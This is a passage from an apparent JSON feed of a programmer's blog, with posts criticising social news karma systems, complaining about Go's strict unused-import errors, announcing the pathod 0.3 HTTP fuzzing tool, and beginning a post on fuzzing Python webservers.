put my feeling of unease in\nwriting, until today. What's spurring me into action is a <a rel=\"external\" href=\"http:\/\/yann.lecun.com\/ex\/pamphlets\/publishing-models.html\">proposal by Yann\nLeCun<\/a> that a model\nsimilar to social news be adopted for scientific peer review - self-assembled\nReviewing Entities voting on streams of submitted papers, regulated by a\nreputation system for authors and reviewers. Basically, this is science a la\nReddit: complete with subreddits, karma and upboats. I find the idea frankly\nterrifying.<\/p>\n<p>I guess it's time, then, to put finger to keyboard and lay out what disquiets\nme about social news.<\/p>\n<h2 id=\"karma-corrupts\">Karma Corrupts<\/h2>\n<p>You start by introducing a reputation mechanism like\n<a rel=\"external\" href=\"http:\/\/www.reddit.com\/wiki\/faq#toc_9\">karma<\/a> to improve some outcome - say, to\nincrease the quality of comments, or to apply a threshold to restrict voting to\ntrustworthy community members. This seems like a plausible and even elegant\nmechanism at first, until you discover the terrible side-effects.<\/p>\n<p>Humans are fundamentally status-seeking social apes, and you've now introduced\na visible measure of social worth that people will be driven to maximize. In\nthe real world, we have a word for those who spend their lives accumulating\nkarma - we call them politicians. And so, within karma communities, we see the\nrise of a political class - persuasive centrists who cater (perhaps\nunconsciously) to a constituency, and who express (perhaps eloquently) opinions\ncalculated to appeal to the masses and avoid controversy. Hacker News and many\nsubreddits are dominated by people like this, whose comments are largely\npredictable and rarely add anything new or unexpected to the conversation.<\/p>\n<p>At the bottom end of the food chain, we have a different class of creature with\nthe same basic aim as the politicians, but without the persuasive charm needed\nto pull off the political approach. These are the karma whores, who use a\nmixture of frank pandering, provocation and calculated outrage to achieve the\nsame aims.<\/p>\n<p>The karma maximization game often acts contrary to the goals we aimed to\nachieve by introducing karma in the first place: the tenor of the community\nsuffers, the diversity of opinion declines, and the karma whores post pictures\nof their cats everywhere.<\/p>\n<h2 id=\"the-lossy-sieve\">The Lossy Sieve<\/h2>\n<p>Go and have a look at the <a rel=\"external\" href=\"http:\/\/news.ycombinator.com\/newest\">new story submission\nqueue<\/a> on Hacker News. Scroll through a few\npages, and pay attention to the stories stuck at one vote - they will most\nlikely never receive another upvote and will die in obscurity. Now, go look at\nthe <a rel=\"external\" href=\"http:\/\/news.ycombinator.com\/\">front page<\/a>. When I do this exercise I'm\nstruck by the fact that there's plenty of crap on the front page, and quite a\nbit of good stuff in the submission queue languishing in obscurity. So, quality\ncan't be the sole metric here - what determines what gets onto the front page\nand what doesn't?<\/p>\n<p>Lets try a thought experiment. First, set up a small number of voting accounts - say,\n10 or so. Now, in the new submission queue, pick 5 random stories every\nhour, and give them a small number of upvotes soon after they are submitted. I\npredict that you will find that stories that received this small initial boost\nare vastly more likely to end up on the front page. If I'm right, then chance\ndominates story selection - as long as an article exceeds some basic quality\nthreshold, it all depends on who happens to see the story soon after it is\nsubmitted, and whether the spirit moves them to vote. Note that this is not the\ncase at the extremes - frankly bad content won't be upvoted, and really\nimportant stories will usually find their way to the top. The lossy sieve\nphenomenon affects everything in between.<\/p>\n<p>What this boils down to is that social news doesn't provide an effective filter - good\ncontent gets lost, and mediocre content finds its way onto our screens.<\/p>\n<h2 id=\"the-pinhole-effect\">The Pinhole Effect<\/h2>\n<p>In social news, the front page is king. Most users never go beyond the first or\nsecond page of top stories. However, front-page real estate is incredibly\nlimited compared to the volume of submissions on most popular subreddits and on\nHacker News. The effect of this is that we're looking at a fast-flowing river\nof information through a pinhole.  Even assuming that the selection mechanism\nworks flawlessly, what you see on the front page is a small sliver of the\ntotal, chosen through a consensus mechanism that takes no account of individual\nvariation in tastes and interests. The news you see is not tailored to <em>you<\/em> -\nit's tailored to some abstract, average participant, with all the rough edges\nof individuality smoothed away. The effect of this is that even at its best,\nthe stories that emerge from the social news system feel like a predictable\npablum dished up by the hivemind. The subreddit system tries to improve this by\nallowing communities to self-assemble around interests, but the pinhole effect\nstill dominates in busy subreddits like\n<a rel=\"external\" href=\"http:\/\/reddit.com\/r\/programming\">\/r\/programming<\/a>.<\/p>\n<h2 id=\"gaming-the-system\">Gaming The System<\/h2>\n<p>Social news systems are eminently gameable, and cheating is rife. Part of the\nreason for this is that a story's destiny depends on a relatively small number\nof votes. If your story has any merit at all, you significantly increase the\nlikelihood that it will end up on the front page by giving it a small nudge at\nthe beginning of its life. If it has no merit whatsoever, you can still force\nit onto people's screens with a few tens or hundreds of votes. Conversely, you\ncan use the same effect to censor and oppress views you disagree with if your\nsocial news site has downvotes. Anyone who's kept an eye on these things can\nrattle off examples of gaming in action: the <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Digg_Patriots\">voting\nrings<\/a>, the <a rel=\"external\" href=\"http:\/\/www.reddit.com\/r\/reddit.com\/comments\/b7e25\/today_i_learned_that_one_of_reddits_most_active\/\">\"social media\nconsultants\"<\/a>,\nthe <a rel=\"external\" href=\"http:\/\/www.reddit.com\/r\/shitredditsays\">vigilante thought-polizei<\/a>,\nthe <a rel=\"external\" href=\"http:\/\/www.reddit.com\/comments\/2n2tu\/ron_paul_on_the_debate_my_opponents_called_for\/c2n5v8\">political\noperators<\/a>,\nand dozens of other types of manipulation and villainy. What's more - these\nvisible scandals are just the tip of the iceberg. Eyeballs are valuable, and\nthere's an active arms race with social news sites on the one side, and a dark\narmy of spammers, scammers and true believers on the other. How much of what we\nsee is affected by this type of cheating? We just don't know, but my suspicion\nis that the effect is significant.<\/p>\n<p>The point here is broader than any particular instance of gaming. It's that\nsocial news sites are structurally susceptible to manipulation in ways that\ncan't be fixed without changing the core of their operation. A system like this\nmight be good enough to deliver <a rel=\"external\" href=\"http:\/\/knowyourmeme.com\/memes\/rage-comics\">rage\ncomics<\/a>, but I feel queasy trusting\nit any further.<\/p>\n<h2 id=\"community-collapse-disorder\">Community Collapse Disorder<\/h2>\n<p>My final beef with social news is a problem that it shares with pretty much all\nonline communities, especially technical ones. We're all familiar with the\nlife-cycle of technical forums. They start with a small community of insiders\nwho create value, which then attracts more people to participate, which then\ndilutes the quality of the contributions (and often introduces a few\npathological bad actors), which then causes the good contributors to move on,\nwhich causes the magic well to dry up. Everyone then take their toys and move\nto the next community, and the cycle repeats. We saw this with Usenet and the\noriginal C2 wiki, and we are seeing it now with Hacker News and many technical\nsubreddits all at various points in this life-cycle.<\/p>\n<p>I believe that Community Collapse Disorder is one of the Big Problems online\nthat we don't yet have a satisfactory solution to. People are trying, though.\nHacker News, for instance, seems to be rather <a rel=\"external\" href=\"https:\/\/www.google.com\/search?hl=en&amp;q=site%3Anews.ycombinator.com+%22eternal+september%22\">poignantly aware of its own\ndecline<\/a>,\nwith some of the <a rel=\"external\" href=\"http:\/\/al3x.net\/2011\/02\/22\/solving-the-hacker-news-problem.html\">best of the old-timers calling for an\nalternative<\/a>.\nPaul Graham himself recognizes the issue, and has been tweaking things in\nvarious ways to combat the phenomenon, without much success.<\/p>\n<p>At the moment, we just don't know how to build online communities that are both\ninclusive and stable. Democracy, here, seems to lead inevitably to decline, and\nsocial news sites are no exception.<\/p>\n<h2 id=\"a-better-way-forward\">A better way forward?<\/h2>\n<p>A big part of the reason I don't use social news anymore is that my existing\nsocial networks have become so much more effective at turning up good content.\nThe absolute best source of news for me is simply the set of links shared by\nthe folks I follow on <a rel=\"external\" href=\"http:\/\/twitter.com\/cortesi\">Twitter<\/a>. I follow people\nwho post interesting content, and whom I trust to act as information filters\nfor me. Most of them share my technical interests, but some are interesting\nbecause they are from my home town, or because they share some more esoteric\npursuit with me. So, the news stream I see is exactly tailored to me. At the\nsame time, there is also room idiosyncrasy - if someone I follow shares\nsomething left-field that tickles their fancy, I'll see it. In turn, I try to\nbe a responsible information filter for those who follow me - I find a link or\ntwo worth tweeting on most days.<\/p>\n<p>There are still things I miss - Twitter is great for sharing links, but is an\nawful medium for technical discussion.\n<a rel=\"external\" href=\"https:\/\/plus.google.com\/106243676845481872244\">Google+<\/a> could be a better\nalternative, but just doesn't seem to have achieved liftoff for me. I would\nalso love better tools for aggregating and harvesting links from my social\nnetwork. At the moment I use <a rel=\"external\" href=\"http:\/\/flipboard.com\">Flipboard<\/a> and\n<a rel=\"external\" href=\"http:\/\/getprismatic.com\">Prismatic<\/a>, but I have issues with both. On the\nwhole, though, these are quibbles. It seems to me that using social networks to\nfilter news is a better way forward - if I was tackling the social news\nproblem, I'd be building tools to support this process.<\/p>\n"},{"title":"Go: a nice language with an annoying personality","published":"2013-01-18T00:00:00+00:00","updated":"2013-01-18T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/go\/go-rant\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/go\/go-rant\/","content":"<p>Last week, I had the pleasure of attending <a rel=\"external\" href=\"http:\/\/dropbox.com\">Dropbox<\/a>'s\nannual company <a rel=\"external\" href=\"https:\/\/blog.dropbox.com\/2012\/03\/hack-week-ii\/\">hack fest<\/a>.  It\nwas a great opportunity to get a look at how Dropbox works internally, and\nmingle with the smart and driven folks who make one of my favourite products. In\nthe spirit of hack week, me and my friend\n<a rel=\"external\" href=\"http:\/\/twitter.com\/alexdong\">@alexdong<\/a> decided to do our project in Go. We'd\nboth wanted to explore the language, but had never quite been able to make time - a week-long code holiday seemed to be the perfect opportunity. I was hopeful\nthat Go would turn out to hit a magical sweet spot: a light set of abstractions\nhugging close to the machine, while still providing the indoor plumbing and\ncivilized conveniences of life that I had grown used to with languages like\nPython. Five days of furious hacking later, I can report that Go might well\ndeliver on this promise, but has enough annoying personality quirks that I will\nthink twice about basing any more projects on it.<\/p>\n<p>My main beef with Go has nothing to do with fundamental language design, and may\nseem almost inconsequential at first glance. The Go compiler treats unused\nmodule imports and declared variables as compile errors. This is great in theory\nand is something you might well want to enforce before code can be committed,\nbut during the actual <em>process<\/em> of producing code it's nothing but an irksome,\nunnecessary pain in the ass. Let's look at a concrete example, starting with a\nsnippet of code as follows <sup class=\"footnote-reference\"><a href=\"#1\">1<\/a><\/sup><\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">import<\/span><span> (<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #032F62;\">    &quot;<\/span><span style=\"color: #6F42C1;\">io\/ioutil<\/span><span style=\"color: #032F62;\">&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span>    m, err<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> ioutil.<\/span><span style=\"color: #6F42C1;\">ReadFile<\/span><span>(path)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> err<\/span><span style=\"color: #D73A49;\"> !=<\/span><span style=\"color: #005CC5;\"> nil<\/span><span> {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        return<\/span><span style=\"color: #005CC5;\"> nil<\/span><span>, err<\/span><\/span>\n<span class=\"giallo-l\"><span>    }<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">    DoSomething<\/span><span>(m)<\/span><\/span><\/code><\/pre>\n<p>I'm a firm believer that printing stuff to screen is a programmer's best\ndebugging tool, so say we're hacking away and want to print the value of <strong>m<\/strong>\nwhile running our unit tests. We change the code as follows, adding an import\nfor the \"fmt\" module and a call to Print:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">import<\/span><span> (<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #032F62;\">    &quot;<\/span><span style=\"color: #6F42C1;\">io\/ioutil<\/span><span style=\"color: #032F62;\">&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #032F62;\">    &quot;<\/span><span style=\"color: #6F42C1;\">fmt<\/span><span style=\"color: #032F62;\">&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span>    m, err<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> ioutil.<\/span><span style=\"color: #6F42C1;\">ReadFile<\/span><span>(path)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> err<\/span><span style=\"color: #D73A49;\"> !=<\/span><span style=\"color: #005CC5;\"> nil<\/span><span> {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        return<\/span><span style=\"color: #005CC5;\"> nil<\/span><span>, err<\/span><\/span>\n<span class=\"giallo-l\"><span>    }<\/span><\/span>\n<span class=\"giallo-l\"><span>    fmt.<\/span><span style=\"color: #6F42C1;\">Print<\/span><span>(m)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">    DoSomething<\/span><span>(m)<\/span><\/span><\/code><\/pre>\n<p>Now we keep hacking, and want to comment out the print statement for a moment\nlike so:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">import<\/span><span> (<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #032F62;\">    &quot;<\/span><span style=\"color: #6F42C1;\">io\/ioutil<\/span><span style=\"color: #032F62;\">&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #032F62;\">    &quot;<\/span><span style=\"color: #6F42C1;\">fmt<\/span><span style=\"color: #032F62;\">&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span>    m, err<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> ioutil.<\/span><span style=\"color: #6F42C1;\">ReadFile<\/span><span>(path)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> err<\/span><span style=\"color: #D73A49;\"> !=<\/span><span style=\"color: #005CC5;\"> nil<\/span><span> {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        return<\/span><span style=\"color: #005CC5;\"> nil<\/span><span>, err<\/span><\/span>\n<span class=\"giallo-l\"><span>    }<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    \/\/fmt.Print(m)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">    DoSomething<\/span><span>(m)<\/span><\/span><\/code><\/pre>\n<p>This is a compile error. We have to switch contexts, move to the top of the\nmodule, also comment out the import, and then move back to the spot we're\nreally hacking on:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">import<\/span><span> (<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #032F62;\">    &quot;<\/span><span style=\"color: #6F42C1;\">io\/ioutil<\/span><span style=\"color: #032F62;\">&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    \/\/&quot;fmt&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span>    m, err<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> ioutil.<\/span><span style=\"color: #6F42C1;\">ReadFile<\/span><span>(path)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> err<\/span><span style=\"color: #D73A49;\"> !=<\/span><span style=\"color: #005CC5;\"> nil<\/span><span> {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        return<\/span><span style=\"color: #005CC5;\"> nil<\/span><span>, err<\/span><\/span>\n<span class=\"giallo-l\"><span>    }<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    \/\/fmt.Print(m)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">    DoSomething<\/span><span>(m)<\/span><\/span><\/code><\/pre>\n<p>A few seconds later, we want to re-enable the Print statement - so up we go\nagain to the top of the module to re-enable the import. This is even worse when\nwe want to, say, comment out the <strong>DoSomething<\/strong> call while hacking:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">import<\/span><span> (<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #032F62;\">    &quot;<\/span><span style=\"color: #6F42C1;\">io\/ioutil<\/span><span style=\"color: #032F62;\">&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span>    m, err<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> ioutil.<\/span><span style=\"color: #6F42C1;\">ReadFile<\/span><span>(path)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> err<\/span><span style=\"color: #D73A49;\"> !=<\/span><span style=\"color: #005CC5;\"> nil<\/span><span> {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        return<\/span><span style=\"color: #005CC5;\"> nil<\/span><span>, err<\/span><\/span>\n<span class=\"giallo-l\"><span>    }<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    \/\/DoSomething(m)<\/span><\/span><\/code><\/pre>\n<p>This is also a compile error because now <em>m<\/em> is unused. We have to hunt up in\nour code to find the declaration, which could be explicit or implicit using an\n<strong>:=<\/strong> assignment. So, in this case we find the declaration, and use the magic\nunderscore name to throw the offending value away:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">import<\/span><span> (<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #032F62;\">    &quot;<\/span><span style=\"color: #6F42C1;\">io\/ioutil<\/span><span style=\"color: #032F62;\">&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span>    _, err<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> ioutil.<\/span><span style=\"color: #6F42C1;\">ReadFile<\/span><span>(path)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> err<\/span><span style=\"color: #D73A49;\"> !=<\/span><span style=\"color: #005CC5;\"> nil<\/span><span> {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        return<\/span><span style=\"color: #005CC5;\"> nil<\/span><span>, err<\/span><\/span>\n<span class=\"giallo-l\"><span>    }<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    \/\/DoSomething(m)<\/span><\/span><\/code><\/pre>\n<p>That should fix it, right? Well, no. It turns out we've previously declared and\nused <strong>err<\/strong> (a very common idiom), so this is still a compile error. We're\nusing the \"declare and assign\" syntax, but have no new variables on the\nleft-hand side of the \":=\". So we need to make another tweak:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">import<\/span><span> (<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #032F62;\">    &quot;<\/span><span style=\"color: #6F42C1;\">io\/ioutil<\/span><span style=\"color: #032F62;\">&quot;<\/span><\/span>\n<span class=\"giallo-l\"><span>)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span>    _, err<\/span><span style=\"color: #D73A49;\"> =<\/span><span> ioutil.<\/span><span style=\"color: #6F42C1;\">ReadFile<\/span><span>(path)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    if<\/span><span> err<\/span><span style=\"color: #D73A49;\"> !=<\/span><span style=\"color: #005CC5;\"> nil<\/span><span> {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        return<\/span><span style=\"color: #005CC5;\"> nil<\/span><span>, err<\/span><\/span>\n<span class=\"giallo-l\"><span>    }<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">...<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    \/\/DoSomething(m)<\/span><\/span><\/code><\/pre>\n<p>Five seconds later, we want to re-enable <strong>DoSomething<\/strong>, and now we have to\nunwind the entire process.<\/p>\n<p>The cumulative effect of all this is like trying to write code while someone\nnext to you randomly knocks your hands off the keyboard every few seconds.\nIt's a pointlessly pedantic approach that adds constant friction to your\nwrite-compile-test cycle, breaks your flow, and just generally makes life a\nlittle harder for very little benefit. There's no way to turn this mis-feature\noff, no flag we can pass to the compiler to temporarily make this a warning\nrather than an error while hacking<sup class=\"footnote-reference\"><a href=\"#2\">2<\/a><\/sup>.<\/p>\n<p>The irony of the situation is that I agree with the sentiment behind this. I\ndon't want dangling variables or imports in my codebase. And I agree that if\nsomething is worth warning about it's worth making it an error. The mistake is\nto confuse the state we want at the conclusion of a unit of hacking<sup class=\"footnote-reference\"><a href=\"#3\">3<\/a><\/sup>, with\nwhat we need at every point in between, during the write-compile-test cycle.\nThis cycle is the core of the process of actually producing code, and the\n<a rel=\"external\" href=\"http:\/\/xkcd.com\/353\/\">exhilarating sense of weightlessness<\/a> that you get when\nhacking in Python is largely due to the fact that the language works really,\nreally hard to optimize this process. Go has given away this feeling of\nexhilaration, basically for nothing.<\/p>\n<p>Despite all this, it's still possible that the benefits of Go do outweigh its\nirritating personality. Interfaces, memory management, first-class concurrency\nand static type checking is a knockout combination, and the language in general\nhas something of the taut practicality that I love in C. So, despite the\nrantiness of this post, I'll keep hacking on our project and make sure I\nproduce a few thousand more lines of code before making a final call on the\nlanguage. Look for a project release and a blog post along these lines in the\ncoming months.<\/p>\n<div class=\"footnote-definition\" id=\"1\"><sup class=\"footnote-definition-label\">1<\/sup>\n<p>Ellipses indicate \"an arbitrary amount of intervening code\"<\/p>\n<\/div>\n<div class=\"footnote-definition\" id=\"2\"><sup class=\"footnote-definition-label\">2<\/sup>\n<p>I edited this paragraph a bit for tone. I originally accused the Go\ndocumentation of being faintly smug about all of this - which is not fair, and\ndoesn't add anything to the argument.<\/p>\n<\/div>\n<div class=\"footnote-definition\" id=\"3\"><sup class=\"footnote-definition-label\">3<\/sup>\n<p>Why don't we have a word for this? By \"unit of hacking\", I mean the work\nthat goes on between starting to hack on a change-set and doing a commit. At the\nbeginning and at the end, the code is in a clean state, but in between there\nare many periods of transition where cleanliness requirements are relaxed.<\/p>\n<\/div>\n"},{"title":"Released: pathod 0.3","published":"2012-11-16T00:00:00+00:00","updated":"2012-11-16T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/pathod\/announce0_3\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/pathod\/announce0_3\/","content":"<p>I've just released <a rel=\"external\" href=\"http:\/\/pathod.net\">pathod 0.3<\/a>, which beefs up\n<a rel=\"external\" href=\"http:\/\/pathod.net\/docs\/pathoc\">pathoc<\/a>'s fuzzing capabilities, improves the\nspec language and includes lots of bugfixes and other small tweaks. Get it while\nit's hot!<\/p>\n<h2 id=\"better-fuzzing\">Better fuzzing<\/h2>\n<p>A major focus of this release is to improve\n<a rel=\"external\" href=\"http:\/\/pathod.net\/docs\/pathoc\">pathoc<\/a>'s capabilities as a basic fuzzing tool.\nI've had fun <a href=\"https:\/\/corte.si\/posts\/code\/pathod\/pythonservers\/\">breaking webservers<\/a>\nwith pathoc, and it's even come in handy in my Day Job. Here's a quick summary\nof how things have changed.<\/p>\n<ul>\n<li>The <strong>-x<\/strong> flag tells pathoc to explain its requests. This prints out an\nexpanded pathoc query specification, with all randomly generated content and\nquery modifications resolved. If you trigger an exception, you can precisely\nreplay the offending query using this explanation.<\/li>\n<li>The options for outputting requests and responses have been expanded hugely.\nFirst, the <strong>-q<\/strong> and <strong>-r<\/strong> flags tell pathoc to dump complete records of\nrequests and responses respectively. This data is sniffed by instrumenting\nthe socket, so is canonical regardless of our ability to interpret returned\ndata. The <strong>-x<\/strong> option makes pathod dump this data in hexdump format\n(otherwise unprintable characters are escaped to preserve your terminal).<\/li>\n<li>A number of options have been added to let you ignore expected responses.\n<strong>-C<\/strong> takes a comma-separated list of response codes to ignore. <strong>-T<\/strong>\nignores server timeouts. This lets you hone in on the exceptional responses\nthat you care about, and ignore the rest.<\/li>\n<\/ul>\n<h2 id=\"language-improvements\">Language improvements<\/h2>\n<ul>\n<li>I've simplified response specifications by making the response message a\nstandard component with the \"r\" mnemonic.<\/li>\n<li>I've added the \"u\" mnemonic to request specifications, as a shortcut for\nspecifying the User-Agent header:<\/li>\n<\/ul>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>get:\/:u&quot;My Weird User-Agent&quot;<\/span><\/span><\/code><\/pre>\n<p>We also have a small library of representative User-Agent strings that can be\nused instead of specifying your own. For example, this specifies the\nGoogleBot User-Agent string:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>get:\/:ug<\/span><\/span><\/code><\/pre>\n<p>The list of available shortcuts are in the docs, and can be listed from the\ncommandline using the <strong>--show-uas<\/strong> flag to pathoc:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>&gt; .\/pathoc --show-uas<\/span><\/span>\n<span class=\"giallo-l\"><span>User agent strings:<\/span><\/span>\n<span class=\"giallo-l\"><span>   a android<\/span><\/span>\n<span class=\"giallo-l\"><span>   l blackberry<\/span><\/span>\n<span class=\"giallo-l\"><span>   b bingbot<\/span><\/span>\n<span class=\"giallo-l\"><span>   c chrome<\/span><\/span>\n<span class=\"giallo-l\"><span>   f firefox<\/span><\/span>\n<span class=\"giallo-l\"><span>   g googlebot<\/span><\/span>\n<span class=\"giallo-l\"><span>   i ie9<\/span><\/span>\n<span class=\"giallo-l\"><span>   p ipad<\/span><\/span>\n<span class=\"giallo-l\"><span>   h iphone<\/span><\/span>\n<span class=\"giallo-l\"><span>   s safari&lt;\/pre&gt;<\/span><\/span><\/code><\/pre>"},{"title":"pathoc: break all the Python webservers!","published":"2012-09-27T00:00:00+00:00","updated":"2012-09-27T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/pathod\/pythonservers\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/pathod\/pythonservers\/","content":"<p>A few months ago, I announced <a rel=\"external\" href=\"http:\/\/pathod.net\">pathod<\/a>, a pathological HTTP\ndaemon. The project started as a testing tool to let me craft\nstandards-violating HTTP responses while working on\n<a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a>. It soon became a free-standing project, and\nhas turned out to be incredibly useful in security testing, exploit delivery and\ngeneral creative mischief. In the last release, I added pathoc - pathod's\nmalicious client-side twin. It does for HTTP requests what pathod does for HTTP\nresponses, and uses the same <a rel=\"external\" href=\"http:\/\/pathod.net\/docs\/language\">hyper-terse specification\nlanguage<\/a>.<\/p>\n<p>In this post, I show how pathoc can be used as a very simple fuzzer, by finding\nissues in a number of major pure-Python webservers. None of the tested servers\nfailed catastrophically - they all caught the unexpected exception and continued\nserving requests. None the less, I think it's reasonable to say that we've\ntriggered a bug if a) the server returns an 500 Internal Server Error response\nor terminates the connection abnormally, and b) we see a traceback in our logs.\nIn fact, by this definition, I found bugs in <em>every<\/em> pure-Python server I\ntested.<\/p>\n<p>All of the problems I list below are simple failures of validation - what they\nhave in common is that somewhere in the project code is called with input that\nit doesn't expect and can't handle.  This matters - in fact, I'd 